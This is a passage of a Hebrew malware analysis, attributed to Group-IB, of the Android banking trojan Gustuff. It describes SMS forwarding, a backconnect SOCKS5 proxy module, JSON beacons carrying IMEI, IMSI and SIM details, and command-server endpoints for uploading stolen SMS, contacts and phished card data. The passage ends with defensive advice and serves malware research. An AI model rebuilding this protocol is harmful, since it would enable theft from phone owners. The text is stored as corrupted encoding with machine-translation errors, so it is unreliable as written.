ื›ืžื• ื›ืŸ, ืœื—ืœื•ืคื™ืŸ, ื”ืืคืœื™ืงืฆื™ื” ื™ื›ื•ืœื” ืœืฉืœื•ื— ื”ื•ื“ืขื•ืช ืœ-CnC. ื”ื•ื“ืขืช ื”-SMS ื ืฉืœื—ืช ืœืฉืจืช ื‘ืคื•ืจืžื˜ JSON:

{
    "id":<%BotID%>,
    "sms":
    {
        "text":<%SMS body%>,
        "number":<%From number%>,
        "date":<%Timestamp%>
    }
}

ืื ื”ื“ื’ืœ ืžื•ื’ื“ืจ nameGenerator("DEFAULT_APP_SMS") โ€“ ื”ืืคืœื™ืงืฆื™ื” ืžืคืกื™ืงื” ืœืขื‘ื“ ืืช ื”ื•ื“ืขืช ื”-SMS ื•ืžื ืงื” ืืช ืจืฉื™ืžืช ื”ื”ื•ื“ืขื•ืช ื”ื ื›ื ืกื•ืช.

ืžื•ื“ื•ืœ ืคืจื•ืงืกื™

ื”ืืคืœื™ืงืฆื™ื” ื”ื ื‘ื“ืงืช ืžื›ื™ืœื” ืžื•ื“ื•ืœ Backconnect Proxy (ืœื”ืœืŸ ืžื•ื“ื•ืœ Proxy), ื‘ืขืœ ืžื—ืœืงื” ื ืคืจื“ืช ื”ื›ื•ืœืœืช ืฉื“ื•ืช ืกื˜ื˜ื™ื™ื ืขื ืชืฆื•ืจื”. ื ืชื•ื ื™ ื”ืชืฆื•ืจื” ืžืื•ื—ืกื ื™ื ื‘ื“ื•ื’ืžื” ื‘ืฆื•ืจื” ื‘ืจื•ืจื”:

ืื™ืš ื”-Android Trojan Gustuff ืžื—ืœื™ืง ืืช ื”ืฉืžื ืช (ืคื™ืื˜ ื•ืงืจื™ืคื˜ื•) ืžื”ื—ืฉื‘ื•ื ื•ืช ืฉืœืš

ื›ืœ ื”ืคืขื•ืœื•ืช ืฉื‘ื•ืฆืขื• ืขืœ ื™ื“ื™ ืžื•ื“ื•ืœ ื”-Proxy ืžื—ื•ื‘ืจื•ืช ืœืงื‘ืฆื™ื. ืœืฉื ื›ืš, ื”ืืคืœื™ืงืฆื™ื” ื‘-External Storage ื™ื•ืฆืจืช ืกืคืจื™ื™ื” ื‘ืฉื "logs" (ื”ืฉื“ื” ProxyConfigClass.logsDir ื‘ืžื—ืœืงืช ื”ืชืฆื•ืจื”), ืฉื‘ื” ืžืื•ื—ืกื ื™ื ืงื‘ืฆื™ ื™ื•ืžืŸ. ืจื™ืฉื•ื ืžืชืจื—ืฉ ื‘ืงื‘ืฆื™ื ืขื ืฉืžื•ืช:

  1. main.txt - ื”ืขื‘ื•ื“ื” ืฉืœ ื”ืžื—ืœืงื” ืฉื ืงืจืืช CommandServer ืžื—ื•ื‘ืจืช ืœืงื•ื‘ืฅ ื–ื”. ื‘ื”ืžืฉืš, ืจื™ืฉื•ื ื”ืžื—ืจื•ื–ืช str ืœืงื•ื‘ืฅ ื–ื” ื™ืกื•ืžืŸ ื›-mainLog(str).
  2. session-<%id%>.txt - ืงื•ื‘ืฅ ื–ื” ืฉื•ืžืจ ื ืชื•ื ื™ ื™ื•ืžืŸ ื”ืงืฉื•ืจื™ื ืœื”ืคืขืœืช ืคืจื•ืงืกื™ ืกืคืฆื™ืคื™ืช. ื‘ื”ืžืฉืš, ืจื™ืฉื•ื ื”ืžื—ืจื•ื–ืช str ืœืงื•ื‘ืฅ ื–ื” ื™ืกื•ืžืŸ ื›-sessionLog (str).
  3. server.txt - ืงื•ื‘ืฅ ื–ื” ืžืฉืžืฉ ืœืชื™ืขื•ื“ ื›ืœ ื”ื ืชื•ื ื™ื ืฉื ื›ืชื‘ื• ืœืงื‘ืฆื™ื ื”ืžืชื•ืืจื™ื ืœืขื™ืœ.

ืคื•ืจืžื˜ ื ืชื•ื ื™ ื™ื•ืžืŸ:

<%Date%> [Thread[<%thread id%>], id[]]: log-string

ื—ืจื™ื’ื™ื ื”ืžืชืจื—ืฉื™ื ื‘ืžื”ืœืš ืคืขื•ืœืช ืžื•ื“ื•ืœ ื”-Proxy ื ืจืฉืžื•ืช ื’ื ืœืงื•ื‘ืฅ. ืœืฉื ื›ืš, ื”ื™ื™ืฉื•ื ื™ื•ืฆืจ ืื•ื‘ื™ื™ืงื˜ JSON ื‘ืคื•ืจืžื˜ ื”ื‘ื:

{
    "uncaughtException":<%short description of throwable%>
    "thread":<%thread%>
    "message":<%detail message of throwable%>
    "trace":        //Stack trace info
        [
            {
                "ClassName":
                "FileName":
                "LineNumber":
                "MethodName":
            },
            {
                "ClassName":
                "FileName":
                "LineNumber":
                "MethodName":
            }
        ]
}

ืœืื—ืจ ืžื›ืŸ ื”ื•ื ืžืžื™ืจ ืื•ืชื• ืœื™ื™ืฆื•ื’ ืžื—ืจื•ื–ืช ื•ืžืชืขื“ ืื•ืชื•.

ืžื•ื“ื•ืœ ื”-Proxy ืžื•ืคืขืœ ืœืื—ืจ ืงื‘ืœืช ื”ืคืงื•ื“ื” ื”ืžืชืื™ืžื”. ื›ืืฉืจ ืžืชืงื‘ืœืช ืคืงื•ื“ื” ืœื”ืคืขืœืช ืžื•ื“ื•ืœ ื”-Proxy, ื”ืืคืœื™ืงืฆื™ื” ืžืคืขื™ืœื” ืฉื™ืจื•ืช ืฉื ืงืจื MainService, ืฉืื—ืจืื™ืช ืขืœ ื ื™ื”ื•ืœ ืคืขื•ืœืช ืžื•ื“ื•ืœ ื”-Proxy - ื”ืคืขืœืชื• ื•ืขืฆื™ืจืชื•.

ืฉืœื‘ื™ ืชื—ื™ืœืช ื”ืฉื™ืจื•ืช:

1. ืžืคืขื™ืœ ื˜ื™ื™ืžืจ ืฉืคื•ืขืœ ืคืขื ื‘ื“ืงื” ื•ื‘ื•ื“ืง ืืช ื”ืคืขื™ืœื•ืช ืฉืœ ืžื•ื“ื•ืœ ื”-Proxy. ืื ื”ืžื•ื“ื•ืœ ืื™ื ื• ืคืขื™ืœ, ื”ื•ื ืžืคืขื™ืœ ืื•ืชื•.
ื’ื ื›ืืฉืจ ื”ืื™ืจื•ืข ืžื•ืคืขืœ android.net.conn.CONNECTIVITY_CHANGE ืžื•ื“ื•ืœ ื”-Proxy ืžื•ืคืขืœ.

2. ื”ืืคืœื™ืงืฆื™ื” ื™ื•ืฆืจืช Wake-lock ืขื ื”ืคืจืžื˜ืจ PARTIAL_WAKE_LOCK ื•ืชื•ืคืก ืื•ืชื•. ื–ื” ืžื•ื ืข ืžื”ืžืขื‘ื“ ืฉืœ ื”ืžื›ืฉื™ืจ ืœืขื‘ื•ืจ ืœืžืฆื‘ ืฉื™ื ื”.

3. ืžืคืขื™ืœ ืืช ืžื—ืœืงืช ืขื™ื‘ื•ื“ ื”ืคืงื•ื“ื•ืช ืฉืœ ืžื•ื“ื•ืœ ื”-Proxy, ืชื—ื™ืœื” ืจื•ืฉื ืืช ื”ืฉื•ืจื” mainLog("ื”ืชื—ืœ ืฉืจืช") ะธ

Server::start() host[<%proxy_cnc%>], commandPort[<%command_port%>], proxyPort[<%proxy_port%>]

ืื™ืคื” proxy_cnc, command_port ื•-proxy_port โ€“ ืคืจืžื˜ืจื™ื ื”ืžืชืงื‘ืœื™ื ืžืชืฆื•ืจืช ืฉืจืช ื”-Proxy.

ืžื—ืœืงืช ืขื™ื‘ื•ื“ ื”ืคืงื•ื“ื•ืช ื ืงืจืืช CommandConnection. ืžื™ื“ ืœืื—ืจ ื”ื”ืคืขืœื”, ืžื‘ืฆืข ืืช ื”ืคืขื•ืœื•ืช ื”ื‘ืื•ืช:

4. ืžืชื—ื‘ืจ ืœ ProxyConfigClass.host: ProxyConfigClass.commandPort ื•ืฉื•ืœื— ื ืชื•ื ื™ื ืขืœ ื”ืžื›ืฉื™ืจ ื”ื ื’ื•ืข ืœืฉื ื‘ืคื•ืจืžื˜ JSON:

{
    "id":<%id%>,
    "imei":<%imei%>,
    "imsi":<%imsi%>,
    "model":<%model%>,
    "manufacturer":<%manufacturer%>,
    "androidVersion":<%androidVersion%>,
    "country":<%country%>,
    "partnerId":<%partnerId%>,
    "packageName":<%packageName%>,
    "networkType":<%networkType%>,
    "hasGsmSupport":<%hasGsmSupport%>,
    "simReady":<%simReady%>,
    "simCountry":<%simCountry%>,
    "networkOperator":<%networkOperator%>,
    "simOperator":<%simOperator%>,
    "version":<%version%>
}

ืื™ืคื”:

  • id - ืžื–ื”ื”, ืžื ืกื” ืœืงื‘ืœ ืขืจืš ืขื ื”ืฉื“ื” "id" ืžืงื•ื‘ืฅ ื”ืขื“ืคื•ืช ืžืฉื•ืชืคื•ืช ื‘ืฉื "x". ืื ืœื ื ื™ืชืŸ ื”ื™ื” ืœื”ืฉื™ื’ ืขืจืš ื–ื”, ื”ื•ื ื™ื•ืฆืจ ืขืจืš ื—ื“ืฉ. ืœืคื™ื›ืš, ืœืžื•ื“ื•ืœ ื”-Proxy ื™ืฉ ืžื–ื”ื” ืžืฉืœื•, ืืฉืจ ื ื•ืฆืจ ื‘ื“ื•ืžื” ืœืžื–ื”ื” ื”ื‘ื•ื˜.
  • imei - IMEI ืฉืœ ื”ืžื›ืฉื™ืจ. ืื ืื™ืจืขื” ืฉื’ื™ืื” ื‘ืžื”ืœืš ืชื”ืœื™ืš ืงื‘ืœืช ื”ืขืจืš, ื‘ืžืงื•ื ืฉื“ื” ื–ื” ืชื™ื›ืชื‘ ื”ื•ื“ืขืช ื˜ืงืกื˜ ืฉื’ื™ืื”.
  • imsi - ื–ื”ื•ืช ืžื ื•ื™ ืกืœื•ืœืจื™ ื‘ื™ื ืœืื•ืžื™ ืฉืœ ื”ืžื›ืฉื™ืจ. ืื ืื™ืจืขื” ืฉื’ื™ืื” ื‘ืžื”ืœืš ืชื”ืœื™ืš ืงื‘ืœืช ื”ืขืจืš, ื‘ืžืงื•ื ืฉื“ื” ื–ื” ืชื™ื›ืชื‘ ื”ื•ื“ืขืช ื˜ืงืกื˜ ืฉื’ื™ืื”.
  • ื“ื’ื - ื”ืฉื ื”ื’ืœื•ื™ ืœืžืฉืชืžืฉ ื”ืงืฆื” ืฉืœ ื”ืžื•ืฆืจ ื”ืกื•ืคื™.
  • ื™ืฆืจืŸ - ื”ื™ืฆืจืŸ ืฉืœ ื”ืžื•ืฆืจ/ื—ื•ืžืจื” (Build.MANUFACTURER).
  • androidVersion - ืžื—ืจื•ื–ืช ื‘ืคื•ืจืžื˜ "<%release_version%> (<%os_version%>),<%sdk_version%>"
  • ืžื“ื™ื ื” - ื”ืžื™ืงื•ื ื”ื ื•ื›ื—ื™ ืฉืœ ื”ืžื›ืฉื™ืจ.
  • partnerId ื”ื•ื ืžื—ืจื•ื–ืช ืจื™ืงื”.
  • packageName - ืฉื ื—ื‘ื™ืœื”.
  • networkType - ืกื•ื’ ื—ื™ื‘ื•ืจ ื”ืจืฉืช ื”ื ื•ื›ื—ื™ (ืœื“ื•ื’ืžื”: "WIFI", "ืžื•ื‘ื™ื™ืœ"). ื‘ืžืงืจื” ืฉืœ ืฉื’ื™ืื”, ืžื—ื–ื™ืจื” null.
  • hasGsmSupport - ื ื›ื•ืŸ - ืื ื”ื˜ืœืคื•ืŸ ืชื•ืžืš ื‘-GSM, ืื—ืจืช ืœื ื ื›ื•ืŸ.
  • simReady - ืžืฆื‘ ื›ืจื˜ื™ืก ื”-SIM.
  • simCountry - ืงื•ื“ ืžื“ื™ื ื” ISO (ืžื‘ื•ืกืก ืขืœ ืกืคืง ื›ืจื˜ื™ืก ื”-SIM).
  • networkOperator โ€” ืฉื ืžืคืขื™ืœ. ืื ืื™ืจืขื” ืฉื’ื™ืื” ื‘ืžื”ืœืš ืชื”ืœื™ืš ืงื‘ืœืช ื”ืขืจืš, ื‘ืžืงื•ื ืฉื“ื” ื–ื” ืชื™ื›ืชื‘ ื”ื•ื“ืขืช ื˜ืงืกื˜ ืฉื’ื™ืื”.
  • simOperator - ืฉื ืกืคืง ื”ืฉื™ืจื•ืช (SPN). ืื ืื™ืจืขื” ืฉื’ื™ืื” ื‘ืžื”ืœืš ืชื”ืœื™ืš ืงื‘ืœืช ื”ืขืจืš, ื‘ืžืงื•ื ืฉื“ื” ื–ื” ืชื™ื›ืชื‘ ื”ื•ื“ืขืช ื˜ืงืกื˜ ืฉื’ื™ืื”.
  • ื’ืจืกื” - ืฉื“ื” ื–ื” ืžืื•ื—ืกืŸ ื‘ืžื—ืœืงืช ื”ืชืฆื•ืจื”; ืขื‘ื•ืจ ื”ื’ืจืกืื•ืช ืฉื ื‘ื“ืงื• ืฉืœ ื”ื‘ื•ื˜ ื–ื” ื”ื™ื” ืฉื•ื•ื” ืœ-"1.6".

5. ืขื•ื‘ืจ ืœืžืฆื‘ ื”ืžืชื ื” ืœืคืงื•ื“ื•ืช ืžื”ืฉืจืช. ืคืงื•ื“ื•ืช ืžื”ืฉืจืช ืžื’ื™ืขื•ืช ื‘ืคื•ืจืžื˜:

  • 0 ื”ื™ืกื˜ - ืคืงื•ื“ื”
  • ื”ื™ืกื˜ 1 - ื–ื™ื”ื•ื™ ื”ืคืขืœื”
  • 2 ืื•ืคืกื˜ - ืื•ืจืš
  • 4 ื”ื™ืกื˜ - ื ืชื•ื ื™ื

ื›ืืฉืจ ืžื’ื™ืขื” ืคืงื•ื“ื”, ื”ืืคืœื™ืงืฆื™ื” ืžืชืขื“ืช:
mainLog("Header { sessionId<%id%>], type[<%command%>], length[<%length%>] }")

ื”ืคืงื•ื“ื•ืช ื”ื‘ืื•ืช ืžื”ืฉืจืช ืืคืฉืจื™ื•ืช:

ืฉื ืคื™ืงื•ื“ ื ืชื•ื ื™ื ืชื™ืื•ืจ
connectionId 0 ืžื–ื”ื” ื—ื™ื‘ื•ืจ ืฆื•ืจ ืงืฉืจ ื—ื“ืฉ
ืœื™ืฉื•ืŸ 3 ื–ึฐืžึทืŸ ื”ืฉื”ื” ืืช ืžื•ื“ื•ืœ ื”-Proxy
ืคื™ื ื’ ืคื•ื ื’ 4 - ืฉืœื— ื”ื•ื“ืขืช PONG

ื”ื•ื“ืขืช PONG ืžื•ืจื›ื‘ืช ืž-4 ื‘ืชื™ื ื•ื ืจืื™ืช ื›ืš: 0x04000000.

ื›ืืฉืจ ื”ืคืงื•ื“ื” connectionId ืžืชืงื‘ืœืช (ื›ื“ื™ ืœื™ืฆื•ืจ ื—ื™ื‘ื•ืจ ื—ื“ืฉ) CommandConnection ื™ื•ืฆืจ ืžื•ืคืข ืฉืœ ืžื—ืœืงื” ProxyConnection.

  • ืฉื ื™ ื›ื™ืชื•ืช ืœื•ืงื—ื•ืช ื—ืœืง ื‘-proxying: ProxyConnection ะธ ืกื•ืฃ. ื‘ืขืช ื™ืฆื™ืจืช ื›ื™ืชื” ProxyConnection ืžืชื—ื‘ืจ ืœื›ืชื•ื‘ืช ProxyConfigClass.host: ProxyConfigClass.proxyPort ื•ื”ืขื‘ืจืช ืื•ื‘ื™ื™ืงื˜ JSON:

 {
    "id":<%connectionId%>
}

ื‘ืชื’ื•ื‘ื”, ื”ืฉืจืช ืฉื•ืœื— ื”ื•ื“ืขืช SOCKS5 ื”ืžื›ื™ืœื” ืืช ื›ืชื•ื‘ืช ื”ืฉืจืช ื”ืžืจื•ื—ืง ืื™ืชื• ื™ืฉ ืœื™ืฆื•ืจ ืืช ื”ื—ื™ื‘ื•ืจ. ืื™ื ื˜ืจืืงืฆื™ื” ืขื ืฉืจืช ื–ื” ืžืชืจื—ืฉืช ื“ืจืš ื”ืžื—ืœืงื” ืกื•ืฃ. ื ื™ืชืŸ ืœื™ื™ืฆื’ ืืช ื”ื’ื“ืจืช ื”ื—ื™ื‘ื•ืจ ื‘ืื•ืคืŸ ืกื›ืžื˜ื™ ื‘ืื•ืคืŸ ื”ื‘ื:

ืื™ืš ื”-Android Trojan Gustuff ืžื—ืœื™ืง ืืช ื”ืฉืžื ืช (ืคื™ืื˜ ื•ืงืจื™ืคื˜ื•) ืžื”ื—ืฉื‘ื•ื ื•ืช ืฉืœืš

ืื™ื ื˜ืจืืงืฆื™ื•ืช ื‘ืจืฉืช

ื›ื“ื™ ืœืžื ื•ืข ื ื™ืชื•ื— ืชืขื‘ื•ืจื” ืขืœ ื™ื“ื™ ืกื ื™ืคืจื™ื ื‘ืจืฉืช, ื ื™ืชืŸ ืœื”ื’ืŸ ืขืœ ื”ืื™ื ื˜ืจืืงืฆื™ื” ื‘ื™ืŸ ืฉืจืช ื”-CnC ื•ื”ืืคืœื™ืงืฆื™ื” ื‘ืืžืฆืขื•ืช ืคืจื•ื˜ื•ืงื•ืœ SSL. ื›ืœ ื”ื ืชื•ื ื™ื ื”ืžื•ืขื‘ืจื™ื ื”ืŸ ืžื”ืฉืจืช ื•ื”ืŸ ืืœื™ื• ืžื•ืฆื’ื™ื ื‘ืคื•ืจืžื˜ JSON. ื”ืืคืœื™ืงืฆื™ื” ืžื‘ืฆืขืช ืืช ื”ื‘ืงืฉื•ืช ื”ื‘ืื•ืช ื‘ืžื”ืœืš ื”ืคืขื•ืœื”:

  • http://<%CnC%>/api/v1/set_state.php - ื”ืชื•ืฆืื” ืฉืœ ื‘ื™ืฆื•ืข ื”ืคืงื•ื“ื”.
  • http://<%CnC%>/api/v1/get.php - ืงื‘ืœืช ืคืงื•ื“ื”.
  • http://<%CnC%>/api/v1/load_sms.php โ€” ื”ื•ืจื“ืช ื”ื•ื“ืขื•ืช SMS ืžืžื›ืฉื™ืจ ื ื’ื•ืข.
  • http://<%CnC%>/api/v1/load_ab.php - ื”ืขืœืืช ืจืฉื™ืžื” ืฉืœ ืื ืฉื™ ืงืฉืจ ืžืžื›ืฉื™ืจ ื ื’ื•ืข.
  • http://<%CnC%>/api/v1/aevents.php โ€“ ื”ื‘ืงืฉื” ืžืชื‘ืฆืขืช ื‘ืขืช ืขื“ื›ื•ืŸ ืคืจืžื˜ืจื™ื ื”ื ืžืฆืื™ื ื‘ืงื•ื‘ืฅ ื”ื”ืขื“ืคื•ืช.
  • http://<%CnC%>/api/v1/set_card.php - ื”ืขืœืืช ื ืชื•ื ื™ื ืฉื”ื•ืฉื’ื• ื‘ืืžืฆืขื•ืช ื—ืœื•ืŸ ื“ื™ื•ื’ ื”ืžืชื—ื–ื” ืœ-Google Play Market.
  • http://<%CnC%>/api/v1/logs.php - ื”ืขืœืืช ื ืชื•ื ื™ ื™ื•ืžืŸ.
  • http://<%CnC%>/api/v1/records.php - ื”ืขืœืืช ื ืชื•ื ื™ื ืฉื”ืชืงื‘ืœื• ื“ืจืš ื—ืœื•ื ื•ืช ื“ื™ื•ื’.
  • http://<%CnC%>/api/v1/set_error.php - ื”ื•ื“ืขื” ืขืœ ืฉื’ื™ืื” ืฉื”ืชืจื—ืฉื”.

ื”ืžืœืฆื•ืช

ืขืœ ืžื ืช ืœื”ื’ืŸ ืขืœ ืœืงื•ื—ื•ืชื™ื”ืŸ ืžืคื ื™ ื”ืื™ื•ื ืฉืœ ืกื•ืกื™ื ื˜ืจื•ื™ืื ื™ื™ื ื ื™ื™ื“ื™ื, ื—ื‘ืจื•ืช ื—ื™ื™ื‘ื•ืช ืœื”ืฉืชืžืฉ ื‘ืคืชืจื•ื ื•ืช ืžืงื™ืคื™ื ื”ืžืืคืฉืจื™ื ืœื”ืŸ ืœื ื˜ืจ ื•ืœืžื ื•ืข ืคืขื™ืœื•ืช ื–ื“ื•ื ื™ืช ืžื‘ืœื™ ืœื”ืชืงื™ืŸ ืชื•ื›ื ื” ื ื•ืกืคืช ื‘ืžื›ืฉื™ืจื™ ื”ืžืฉืชืžืฉ.

ืœืฉื ื›ืš, ื™ืฉ ืœื—ื–ืง ืืช ืฉื™ื˜ื•ืช ื”ื—ืชื™ืžื” ืœื–ื™ื”ื•ื™ ืกื•ืกื™ื ื˜ืจื•ื™ืื ื™ื™ื ื ื™ื™ื“ื™ื ื‘ื˜ื›ื ื•ืœื•ื’ื™ื•ืช ืœื ื™ืชื•ื— ื”ืชื ื”ื’ื•ืช ื”ืœืงื•ื— ื•ื”ืืคืœื™ืงืฆื™ื” ืขืฆืžื”. ื”ื”ื’ื ื” ืฆืจื™ื›ื” ืœื›ืœื•ืœ ื’ื ืคื•ื ืงืฆื™ื™ืช ื–ื™ื”ื•ื™ ืžื›ืฉื™ืจ ื‘ื˜ื›ื ื•ืœื•ื’ื™ื™ืช ื˜ื‘ื™ืขืช ืืฆื‘ืข ื“ื™ื’ื™ื˜ืœื™ืช, ืฉืชืืคืฉืจ ืœื”ื‘ื™ืŸ ืžืชื™ ื ืขืฉื” ืฉื™ืžื•ืฉ ื‘ื—ืฉื‘ื•ืŸ ืžืžื›ืฉื™ืจ ืœื ื˜ื™ืคื•ืกื™ ื•ื›ื‘ืจ ื ืคืœ ืœื™ื“ื™ื• ืฉืœ ืจืžืื™.

ื ืงื•ื“ื” ื—ืฉื•ื‘ื” ื‘ื™ืกื•ื“ื” ื”ื™ื ื”ื–ืžื™ื ื•ืช ืฉืœ ื ื™ืชื•ื— ื—ื•ืฆื”-ืขืจื•ืฆื™ื, ื”ืžืืคืฉืจ ืœื—ื‘ืจื•ืช ืœืฉืœื•ื˜ ื‘ืกื™ื›ื•ื ื™ื ื”ื ื•ื‘ืขื™ื ืœื ืจืง ื‘ืื™ื ื˜ืจื ื˜, ืืœื ื’ื ื‘ืขืจื•ืฅ ื”ื ื™ื™ื“, ืœืžืฉืœ, ื‘ื™ื™ืฉื•ืžื™ื ืœื‘ื ืงืื•ืช ืกืœื•ืœืจื™ืช, ืขื‘ื•ืจ ืขืกืงืื•ืช ืขื ืžื˜ื‘ืขื•ืช ืงืจื™ืคื˜ื•ื’ืจืคื™ื™ื ื•ื›ืœ ืžืงื•ื ืื—ืจ. ื ื™ืชืŸ ืœื‘ืฆืข ืขืกืงืื•ืช.ืขืกืงื” ืคื™ื ื ืกื™ืช.

ื›ืœืœื™ ื‘ื˜ื™ื—ื•ืช ืœืžืฉืชืžืฉื™ื:

  • ืืœ ืชืชืงื™ืŸ ืืคืœื™ืงืฆื™ื•ืช ืœืžื›ืฉื™ืจ ื ื™ื™ื“ ืขื ืžืขืจื›ืช ื”ืคืขืœื” ืื ื“ืจื•ืื™ื“ ืžื›ืœ ืžืงื•ืจื•ืช ืื—ืจื™ื ืžืœื‘ื“ Google Play, ืฉื™ืžื• ืœื‘ ื‘ืžื™ื•ื—ื“ ืœื–ื›ื•ื™ื•ืช ื”ืžื‘ื•ืงืฉื•ืช ืขืœ ื™ื“ื™ ื”ืืคืœื™ืงืฆื™ื”;
  • ื”ืชืงืŸ ื‘ืื•ืคืŸ ืงื‘ื•ืข ืขื“ื›ื•ื ื™ ืžืขืจื›ืช ื”ืคืขืœื” ืื ื“ืจื•ืื™ื“;
  • ืฉื™ืžื• ืœื‘ ืœื”ืจื—ื‘ื•ืช ืฉืœ ืงื‘ืฆื™ื ืฉื”ื•ืจื“ื•;
  • ืืœ ืชื‘ืงืจ ื‘ืžืฉืื‘ื™ื ื—ืฉื•ื“ื™ื;
  • ืื™ืŸ ืœืœื—ื•ืฅ ืขืœ ืงื™ืฉื•ืจื™ื ืฉื”ืชืงื‘ืœื• ื‘ื”ื•ื“ืขื•ืช SMS.

ืžื›ื›ื‘ ืกืžื™ื•ืŸ ืจื•ื’ืืฆ'ื‘ื”, ืžื•ืžื—ื” ื–ื•ื˜ืจ ื‘ื—ืงืจ ืชื•ื›ื ื•ืช ื–ื“ื•ื ื™ื•ืช ื‘ืžืขื‘ื“ื” ืœื–ื™ื”ื•ื™ ืคืœื™ืœื™ ืžื—ืฉื‘ื™ื Group-IB.

ืžืงื•ืจ: www.habr.com

ื”ื•ืกืคืช ืชื’ื•ื‘ื”